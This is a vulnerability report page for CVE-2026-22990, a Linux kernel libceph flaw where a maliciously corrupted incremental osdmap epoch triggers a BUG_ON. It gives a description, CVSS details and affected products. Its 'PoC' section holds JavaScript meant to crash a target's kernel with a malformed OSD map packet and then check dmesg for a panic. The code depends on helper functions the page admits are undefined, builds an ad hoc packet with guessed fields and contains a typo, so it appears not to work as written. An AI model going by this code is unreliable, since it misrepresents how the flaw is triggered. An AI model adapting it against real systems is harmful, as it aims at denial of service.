Security Vulnerability Report
CVE-2026-22990 CVSS 7.5 HIGH

Published: 2026-01-23 16:15:55
Last Modified: 2026-04-27 14:16:28
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

libceph: replace overzealous BUG_ON in osdmap_apply_incremental()

If the osdmap is (maliciously) corrupted such that the incremental osdmap epoch is different from what is expected, there is no need to BUG. Instead, just declare the incremental osdmap to be invalid.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux kernel libceph (all versions prior to fix)
Ceph distributed storage system with vulnerable kernel modules

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-22990 PoC - Malformed incremental OSD map triggering kernel BUG_ON
// This PoC demonstrates the concept of sending a corrupted osdmap epoch
// Note: Actual exploitation requires access to Ceph cluster communication
// Note: sendUDPPacket() and executeCommand() are not defined on this page

// Simulated corrupted incremental OSD map structure
function createCorruptedIncrementalOSDMap() {
  return {
    epoch: 999999,      // Maliciously high epoch number
    expected_epoch: 1,  // Different from expected value
    osd_features: 0xFF,
    osd_addr: {
      primary: "0.0.0.0:6800",
      cluster_addr: "0.0.0.0:6801"
    },
    crushmap: "CORRUPTED_CRUNSH_DATA"
  };
}

// Send corrupted osdmap to trigger BUG_ON in osdmap_apply_incremental()
function triggerVulnerability(targetIP) {
  const corruptedMap = createCorruptedIncrementalOSDMap();

  // Construct malicious Ceph OSDMap message
  const message = Buffer.alloc(1024);
  message.writeUInt32LE(0x01, 0);                        // Message type: CEPH_MSG_OSDMAP
  message.writeUInt32LE(corruptedMap.epoch, 4);          // Corrupted epoch
  message.writeUInt32LE(corruptedMap.expected_epoch, 8); // Expected epoch

  // Send to target Ceph client/server
  sendUDPPacket(targetIP, 6789, message);

  console.log("[+] Malformed OSD map sent to trigger BUG_ON");
  console.log("[*] Expected epoch:", corruptedMap.expected_epoch);
  console.log("[*] Malicious epoch:", corruptedMap.epoch);
}

// Monitor for kernel panic indicators
function monitorCrash(targetIP) {
  // Check for kernel oops/panic messages
  const dmesg = executeCommand("dmesg | tail -50");
  if (dmesg.includes("BUG_ON") || dmesg.includes("kernel panic")) {
    console.log("[!] System crash detected - vulnerability confirmed");
    return true;
  }
  return false;
}

References

Raw JSON Data
